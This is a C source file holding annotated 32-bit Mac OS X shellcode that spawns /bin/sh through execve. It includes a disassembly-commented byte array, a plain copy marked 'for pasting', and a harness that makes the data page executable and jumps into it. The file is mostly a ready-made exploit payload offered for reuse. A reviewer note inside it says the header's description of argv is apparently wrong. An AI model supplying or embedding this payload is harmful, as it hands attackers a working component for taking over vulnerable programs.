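/*
 * osx86 shellcode
 * execve("/bin/sh",{"/bin/sh",NULL},NULL);
 * by nemo@felinemenace.org
 *
 * 32-bit x86 Mac OS X.  eax = 0x3b (execve), arguments on the user stack
 * below a dummy return slot, kernel entered through the far call gate 0x2b:0.
 *
 * The byte string is NUL-free.  The three zero bytes the code needs - the
 * terminator of "/bin/sh", the zero offset and the 0x002b selector of the far
 * call - are stored by the shellcode itself right before the syscall (the
 * three `mov [edi...]` stores below).  Consequences for anyone reusing it:
 *   - it must run from memory that is writable AND executable: a `const` or
 *     .rodata copy faults on the first store, NX .data faults on the fetch;
 *   - the stores only ever write zeros, so running the same bytes twice is
 *     harmless;
 *   - all patch offsets are relative to edi = address of "/bin/shX", obtained
 *     with the jmp / call / pop trick, so the blob is position independent.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Annotated copy: one string literal per instruction.  The left column is the
 * disassembler's address, kept so the xrefs in the labels stay meaningful.
 * Offsets into the array: instructions occupy bytes 0..36, "/bin/shX" starts
 * at byte 37.
 */
char shellcode[] =
//        ;******************************************************
//        ; function _main
//        ;******************************************************
//        _main:                  ;xref c1ed9
/* 1f32 */ "\x31\xdb"                       // xor ebx, ebx        ; ebx = 0: NULL and the zero-byte source
/* 1f34 */ "\x6a\x3b"                       // push 3bh            ; SYS_execve
/* 1f36 */ "\x58"                           // pop eax
/* 1f37 */ "\x53"                           // push ebx            ; zero word, see NOTE(review) below
/* 1f38 */ "\xeb\x18"                       // jmp loc_1f52        ; 1f3a + 0x18 = 1f52
//        ;-----------------------
//        ; S U B R O U T I N E
//        ;-----------------------
//        sub_1f3a:               ;xref c1f52
/* 1f3a */ "\x5f"                           // pop edi             ; edi = 1f57 = "/bin/shX" (pushed by the call)
/* 1f3b */ "\x57"                           // push edi
/* 1f3c */ "\x53"                           // push ebx            ; zero word: terminates envp / argv
/* 1f3d */ "\x54"                           // push esp            ; arg3 envp = &zero word (empty environment)
/* 1f3e */ "\x54"                           // push esp            ; arg2 argv
/* 1f3f */ "\x57"                           // push edi            ; arg1 path = "/bin/sh"
/* 1f40 */ "\x6a\xff"                       // push 0ffffffffh     ; dummy return slot the BSD stack convention expects
/* 1f42 */ "\x88\x5f\x07"                   // mov [edi+7], bl     ; 'X' -> NUL, string becomes "/bin/sh\0"
/* 1f45 */ "\x89\x5f\xf5"                   // mov [edi-0bh], ebx  ; 1f4c..1f4f: far call offset ffffffff -> 0
/* 1f48 */ "\x88\x5f\xfa"                   // mov [edi-6], bl     ; 1f51: far call selector ff2b -> 002b
/* 1f4b */ "\x9a\xff\xff\xff\xff\x2b\xff"   // call 2bh:0          ; encoded as call 0ff2bh:0ffffffffh, fixed up above
//        loc_1f52:               ;xref j1f38
/* 1f52 */ "\xe8\xe3\xff\xff\xff"           // call sub_1f3a       ; 1f57 - 0x1d = 1f3a; pushes 1f57, the string address
/* 1f57 */ "/bin/shX";                      // 'X' is overwritten with NUL at run time
//
// NOTE(review): tracing the pushes, argv ends up as {&zero word, NULL}, i.e.
// argv[0] is an empty string rather than "/bin/sh" as the header says; /bin/sh
// starts regardless.  The zero word pushed at 1f37 sits directly above the
// string pointer pushed at 1f3b and is not reached by the argument pointers as
// traced here.  Confirm against a live run before relying on the header's argv.

/* Same 45 bytes as `shellcode`, without the annotation, for pasting. */
char osx86_execve[] =
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";

/*
 * Test harness: jumps into `shellcode`.
 *
 * The original jumped straight into the .data array, which only works where
 * data pages are executable (as on the i386 OS X this was written for).  The
 * stub also writes to itself, so it needs the page writable too.  The page(s)
 * holding the array are therefore explicitly remapped read/write/execute
 * first; under a strict W^X policy mprotect() is refused and the harness
 * reports that instead of faulting.
 *
 * Returns 1 if the page size cannot be read or the remap is refused.  On
 * success execve() replaces the process and this function never returns.
 */
int main(int ac, char **av)
{
    (void)ac;
    (void)av;

    uintptr_t start = (uintptr_t)shellcode;
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0) {
        perror("sysconf");
        return 1;
    }

    /* Round down to the page holding the first byte, cover through the last. */
    uintptr_t base = start & ~((uintptr_t)page - 1);
    size_t len = (size_t)((start + sizeof shellcode) - base);
    if (mprotect((void *)base, len, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }

    /* Integer -> function pointer cast is implementation-defined but diagnostic-free,
     * unlike the implicit char* -> function pointer conversion this replaces. */
    void (*fp)(void) = (void (*)(void))start;
    fp();
    return 0;
}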